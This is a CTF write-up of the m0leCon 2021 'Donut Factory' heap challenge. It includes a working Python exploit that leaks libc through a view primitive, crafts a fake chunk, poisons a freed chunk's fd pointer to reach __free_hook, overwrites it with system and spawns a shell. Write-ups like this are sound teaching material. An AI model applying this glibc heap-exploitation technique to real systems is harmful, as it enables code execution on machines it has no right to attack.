Tags: craft heap fake_chunk
Rating:
[Link to original writuep](https://wrecktheline.com/writeups/m0lecon-2021/#donut_writeup)
# Donut Factory (15 solves, 263 points)
by FeDEX
```
Come visit our factory to create your custom donuts!
nc challs.m0lecon.it 1743
Author: Alberto247
```
This challenge provided 2 files: `donut` binary and `libc-2.31.so`
A simple menu based challenge with the options to:
- Create donut
- Delete donut
- View donut
- Buy Donut
- Leave
Quickly reversing the program we can find unsanitized input for the `Delete` and `View` functionalities allowing us to perform the actions on arbitrary addresses.
The Delete method takes as input an address and frees it.
The View method takes as input an address and prints a donut based on the first byte.
Following this, I was able to generate all donuts and save their hash in a table and then proceed to leak the libc pointer from a freed heap chunk.
```python
hashes = ["244b8911aae2f329311f6d6511bb3c3c","9e12b4534de7339be7c1c550e42193f4","3517d5c190d9891461f855833686ce02","31f807fd73e342128428d0446620c3cb","e4140bf37897507a4baf6b5a679d9919","70dadc8a305d5594fe42a71785d5a97b","6c1f3bfceb82675c409eb3a9a173592f","27f3bee48c0f41f8fb494fcc8048e919","550fee47562795ebda1ea957e02bda0f","c7b22166c88a40eccfcf8732499e40d1","79a490bd8bc95a9e447f1af1f272f59a","0e793dd64dfb6eeaed878d9dcfa021e3","535e39e5e031961bacd91a1a3e7aaf38","74aecbca921511a0fef7b9db6767795d","df77b317a2ffd306893ca4395cfa2811","0f3c26437382ce2d5cbc253ecf912966","157461a3d1de9805c73b53c36c9d1925","a4bf483f8b958d05d78beadc80ea95a3","c1e90ac302441cdcef82528d318d298a","c59a0fdbec6e95ce8543fe2c0588b199","878f4d8961abb07585eec52242ac5054","1c3c336e76c9f6f4204239d7d68fc0c7","92b72832a439731509cb2b19c5063526","362ca530322fa159c7597a533372b3bc","8507b0c24546f5fc10ebecd26ab718b6","491a700da38fb98b6183e6c18d3296be","6b07a7b8416c7275c973158ddaa7357d","a14b87d441f3a7e52a647328d3a503d2","0a3910b8ac25ae8bbb6a03346b64f04c","9bf2dc4b520f698f5df821b6bdda0832","c36d65dc3f8cbdc199fcdbc78a6adff3","1dfafd64239861ec8976219bb0589351","756c4c95eef6cf127ca47d9c582ffee0","13e206ff982d36e82117d80b7a485aa9","2266c15194b98c647e243461abe42fe3","6ded8fdc2381cce1592f8d09a4a95c3d","b5487c60d1224434444bfd9236c709c7","e1ffb5c58845ffc368069f2a5b217bb5","b1875b40d0a3f4306f3f35203d4f6e47","f76a9c9f0d7acd77ceae43edc5162a5c","91717e87f382ec3643028b82da8c60c0","2fae081d73db99dc269da9bf1d9ecf01","4195d602e0c4b7c9940aaf9f72d3a73a","3b66601aee65402d5034a3b853e59aae","617196e86d4bcf9d7764f30f24734978","781609ffbae6bd53efba2f8bef9bf354","018e0f642cbd14fab3583b11d3503366","d06ad4593071eab0c7a64ffc62b74d61","8566c56cb71bbb4501b6d0f7c33ffcc7","336d9786cde6ea8995193084a1d9535f","2296a95a8d5ed3d6a4a2a5d44b9d8752","a5d41c4efc1668ccd6f13489ee0b6962","db8129e49e38831e955b51722a82e5e9","4dae69a5b462ac042c25bd36d6834c10","ab8ea2d6ab74277e057096ad221e1b1b","7a1b732c62c27e44d58aa5c8b94a89b8","e7776912cf2d73fe9c0ed71bace5468b","a08ba9655620bb8507da6439d64c8d43","a66e9a7140d86c5fb8ae912f432e298d","ee4e519a9c42a244621b16a02840d56f","9dd6f10f3ad48d0de2668e7b59818b7e","26a7195cff38401ec3a72b090bf50eaf","02fbe940ff64454bfd82de8a9b3626b9","61a65086a1da0342805f60b43ff0e03d","3f048d2ee699756f90530154808594ea","c3ad0b1059c7a0ed1254113b724591ad","522a994709b8fca96e5e981cabb655e5","aacd10c132ad192cfb94d3469dc35f24","f0d250a6a25cf33edbb19cc252899a19","408140dd3008b8da4b8378939a309f4a","0bc5c8454d5b3a1054df5d9c1ff38dc0","c91203b96d22b5cb3bdd3b27f0a1f111","e9e6233859c6f5b62532eb760e978178","0d82f46293df813946c1fd6bf159206c","ac448688a38d6f614366bb39cef03eef","93dc00ec08dfb66919f25671523fe612","47f21e690538237b94eeac2ca98ee0b7","088b6256948a64e0f1643be6b072b159","ea01cec409b620a60319291540f614d7","6d25b193f750efba5cd08b2769c0e3a7","4f6b299178369d1ee12b92d9e828bacf","61345b477c5597926af5e6bf36ce0e0a","52aef517cfc57a654ed230ca4c1362d7","c8c204a854409da700158526cae62435","e1cdd4d5caf77c6f3fec87214f5bb9dc","145c3c25998a15749519818bb89c135f","438b5dd73f94a5c5d0d0362ad4a66e6c","46f3a1705af1ebf4d9859b188684fd8a","0475d66adb47f2d47d76c3332b10b7c9","7cfcd6c4d5ad54026e9f537d38b9f59e","039b2e616cc311f44aadfa0c87160883","7cdef375044f36af43db571769536bdf","b1e1b4eead9587bbdff13bf15d197533","7bfb237b4b335c973f3bf7a6dd1cbd32","20dce478a13cec86b93d91a279053fba","33dd8cc72e018ff1c072aa44094b24ca","5ec3331b69725074c0c0774d64275e1f","e6e1729ff202433d82a9a79db3dfbac3","fb75b8d513aeba8a8f77d68f22f99815","b72b90a296d09822fda435208351d399","0186368abd0b3cd1971eb92b22dfa891","240d0624a58b37c76c1c30142ae20c20","1b6986d19e2920b8969eda71c0f06f23","6335c0e4d544e951618e0a2391615620","d882120924e914555016ee516ef8b1f6","5dd36739c264232ce517ef30c69e4020","d44d13f74c644c393daddc806b8effb6","0b347e6704a266e42c74463932e6887c","beec5ab4565cbe1f913a0653234bf996","6f4a0772195bcee71e6554e5e6d06178","256761ab9ec28964531955bad1689db0","8aa2a07a1b6b26dc492110b225e74fa0","cdfc4702005dd5ee08b8fba5400efef2","171582347945021b955f3d9f4bbc3d19","287ec05f16189f349e71e8f5739ff576","cab56c9f5311d74d1716958867abea24","8da48008d6411218ea86ed8d4b2ed3b6","08748849f4347c106f18af768eda9004","d329133ebcfedcc025fde1bf438e3d9f","61c5dd9b0ef3e9193a0b76d0605d8325","ca1bd76a428edc0571f6d4d025c0e5f1","e67f49d0be0c1ca3d15b75ad59dc5286","fba5d4915b188ca14ac29ec613899cdb","a299f56e65ddbadddda8b42d2b2358de","dc295a6371c3612cef283a27e116791d","d2d94c386c355e79016d0c34f7964048","eb6a00da275608fcc6e494bf14ed9a42","8003b4a3745233792a8a64f888b05281","1772180f1b6921354b1dfa2a9287260c","88473fd94b8e70ad46024b443e87e2fe","1b943cbe2b15cfe4fd866cd012912bd0","87e828501e6b82215d52da376fd9eb07","c44673531799a2de7b0344db39c4f1ae","feb0de99e0148fb89301457d8d6183dd","c3ae1a82c5fffb46653ade9aef3374cd","332370cce096416a199132f81c552604","d15a6f84d8176e910e145e9c94888dce","8e7178b0f0bbb42ccdcccfaddff5905e","d6e3c4db0a910736229919317e460925","9bdeea65860ab7ff1b7dba1b93446ccc","d1c82eff6118130af4adfb52963c5d1b","11d2601eab00b6462a39c43012846ab2","f177cef6b70774d36191cc2da5f48a76","3c439c9fd851c489d7e1527ede816560","de7d6a7ecd141bc6cba721b237d5fea4","90294a9ce3e7b02fbe2997e8ea378dff","d72e0b774f76bd6a3ddb823968d217c8","3d5ae0ef52e6f12e2378e83dd45c5b8f","9d72ce79bbaf8aef05d0350203b8da06","81be16218ee6c266773294a0d02d294e","addb2903ff8275d2bcd46ff8308b8e6b","645dbaeaa7dc933079a296bb8f66e083","f374e5a0b750056d00b89bb164970801","de10e4eb59b089d87598ce38f3c2fc9e","9d1bc9288c95a4ea889f437e61e79a15","543fc78ee3d8759c6eec584b7266faca","364d6362838a2b0de8e6482b2be88cc5","7d035f1bbc2f87fc1ccb9166d34f9a24","52eaa4aaed9202a8d4eeced5892af249","523d690bdf5e456e87f8c5a02c6ef0ce","8950b6981b82d6dda8aeb8d58adc9ada","0c5b179b055218ca10675b595b8d25aa","59c8e341cd9f3ebbd53182796506b442","fb04215e976e21486539fca63a559b64","a81861b0313a41d3084fd59da58b6ddf","2578adf8096e9054d7b248b8a8f361cf","33bd9ed361d6132fa027a613d8520bfc","c50bfa8726fd0c941fa49b5c99d2ea0d","154ca97762c31f6dce7aab2fd2dd4464","1c9a10afedd053493cd769d6d285506e","a3c47ecf4e1641a8db7bccb8e94e59c1","0129385b79426e13e24b750fb251b914","7e2daf44701c1356daf09c3fda75043b","e5846a457cc491683b53104df2021bf5","f8df3f2920d49cb3b86c3cb5cca04712","8f6362a7798ac335e5a725093abd06cc","e20d227b4ce6fcc76b8f0c76f6684bea","d7e3a97da001f59263643eb17d017cc8","be8a8dd440b697fac03061912c4021a8","22b001b903ba17c611ba4ed52477ca6b","db89bfdce129d88cf9e0cb7d9fc5c46f","e7769723f8fdbe76e2e1c48d7cddec5e","da3cf19ff1f5ca7fca088ab389b5cff0","0c2887a59682f19aab3012494db3484c","4edd35d8cde21b9695617b1f94076139","af55970f88c5e52a422aeb4b848a7087","77fa572655440cd82db5d42f9e30ca05","6e7a56bf66a07ac42b9a70df1cdac57b","c8652795213654feef519aedafab549c","0269d4b55b3ca1e8db252acf43db1b25","c8da711c93da6f0bd012a46e02c8a391","e00133726009504cbdb9d1697aaad05a","beebc3290e9050f4c8b405a673bb62d6","a1371bbc45894596125c34d9c8515036","ffc2fd64411bd8dc04496505e626bb29","4fe7b41fe37089cf722145b3ab53fd72","042b93b8286f628b5e8083765c4d4a1f","aa775b01118dd41e733ba2d3f3c4bd30","c3e5d248b0ac1c4f5063c4addfe56be9","ee7048a5e23dadd613a556da013dc9f9","88a8935ed4c82c20b1a0e6a02b94c432","7b24d486674fae9f9d182c134a61c4c0","a6af33e066c780b6710518306e2a8ddd","a00b87e316e14a41c8d7988b332ff954","904319188297d0dfed6533c65a4f20bc","44546db5a37f8666a5f5655965dc158a","afe67c388dd12a4943474784be62bf80","e71b8c06fef88758efbfaf0542c18f32","af35dc9ba30af53ab082be2cd763eb2f","87a6a01ec8948d48e7413e6c815e979e","49b44342c19f4d8c5ac214b82ca18d01","d8d8aea73fa72f2c98e7b3b0b5889b6b","4a442985c50d13c3b233b75c93de4595","8a51916019777fb7008318bb0221c6c8","8e53f8838d46fe4aa7e2a89a52f662db","85bb6f314c12f7d74bd62e03215b9153","f276a64fb37fc07c3eed642888332ccd","3d2619f673af2595277601d548059664","2cdfffa1cce47a0f1c103d98010775c3","15acbc1221bf58d5ad7571a8eb35d773","8a1392816509e0ebc42e5bd50792b6a8","73213ef32093bdd8867cbbf3ff4b5c43","24427f6f2e5e3aea08df2d5d04eb31e3","38a2dee8cae9d297855196b48521a774","e322e8836d30fcede0bc4599460570a0","f14b95c1bdd3cdb1f16cd4b03cae42c6","4e74b4d448035455b6da485e99b47a8b","5a889cd08e4bc55319a65aa9a7a75508","c4670d0417bca5fed0568452d4475f2d","99be610f21f7b712164c24d8732abd76","83376b59ba424dd3fb0456801961e107","668c1d8e62bc292ce1ef5b709ea8994f","ea6c08b34f228e10ad5157cd5b550fbe","73a6b98c64c9547fe077ba4d011dbccc","7a50f50ac2b1343aa74b2fcf26fb7a4b","e81b1e29982f3f8dab744b9de6ed3f07","75835b858eac15248772f39fc53eb34d","250bdeb6439df36461c0dd11629735f9","ef88c3e74d9b0e6b8ae895e16a15ba98","fbf35ddef33e6c567b81c6a77023e8d3","537ea975260d29ad418ef4184878d83d","60fe12c00a765af59fba90a2325dd694","aa9126aaa343a4703dd40521f2a4f919","56cb90f8d1c1cf2185c458b3915eaf77","6a9681d9d671b9e8e2b9279db93b9cc0","1826d982863eb441f0f944fff375d459","8d3c19a937665f89faf84f4d5dca8fc5","df95a4ad9a93d9fcb3c8cde5c21919b9","f8172e59c358e958e80ae6cdfaf98cd0","d1ddbe82b534adc606f2c7880bca473a","c6315d205043074b6e24c99678bb8606","db27f5b7975fc23bfb84c769d7da12f5","1ae3ecadf02d6c1ba26b15f92bad611d","8d887a9262277858be3c2cee9f7fc1df","48270138b22931afc183a62e1d77061f","a348d1e3cb8fc29f45650d8e6727d5b5"]
def leak_byte(ptr):
p.sendlineafter('factory\n', 'v')
p.sendlineafter('!', hex(ptr))
donut = p.recvuntil('We')
final_donut = donut.split(b'\x1B')[-1]
to_hash = final_donut[:-2] + b"Do"
hashed = hashlib.md5(to_hash).hexdigest()
return hashes.index(hashed)
def leakqword(ptr):
value = ''
for i in range(8):
tmp = leak_byte(ptr+i)
value += chr(tmp)
return value
```
Once I had the heap (was given by the program) and libc leak, I was ready to craft a fake chunk inside a big chunk, free it, corupt it's `fd` pointer, and then obtain a chunk over `free_hook`.
After that, upon freeing a chunk with `"/bin/sh"` a shell was triggered.
Exploit:
```python
if __name__ == "__main__":
################################## EXPLOIT
xx = create(1, 0x30, '/bin/sh\x00\x0a') # chunk used to trigger shell
d1 = create(1, 0x800, 'A'*10+'\x0a') # use to leak heap and libc
heap_base = int(d1,16)-0x16c0
print 'HEAP >>',hex(heap_base)
d2 = create(1, 20, 'A'*10+'\x0a') # avoid consolidation
print 'DESTROYING >>',d1
destroy(int(d1,16))
leak = leakqword(int(d1,16)) # leaking libc
leak = hex(u64(leak))
libc_base = int(leak,16)-0x1ebbe0
print 'LIBC >>',hex(libc_base)
d1 = create(1, 0x800, 'A'*10+'\x0a') # remove big chunk from unsorted
craftx = create(1, 0x68-2, 'ffff\n') # tmp chunk
craft1 = create(1, 0x200-2, '\x00'*7 + p64(0)*2 + p64(0x70) + '\n') # allocate chunk to hold fake chunk
print 'CRAFT >>', craft1
destroy(int(craftx,16)) # free tmp chunk
destroy(int(craft1,16)+0x20) # free fake chunk
destroy(int(craft1,16)) # free big chunk
craft = create(1, 0x200-2, 'X'*7 + p64(0)*2 +p64(0x70) + p64(int(libc_base)+0x1eeb28-8)*3 + '\n') # reallocate big chunk and corrupt fake chunk's fd
create(1, 0x68-2, 'Y'*0x18 + '\n')
create(1, 0x68-2, 'Z'*7 + p64(int(libc_base)+0x0000000000055410) + '\n') # get chunk over free_hook and overwrite with system
destroy(int(xx,16)+1) # trigger shell
p.interactive()
```
- flag: `ptm{N0w_th1s_1s_th3_r34l_s3rv3r!}`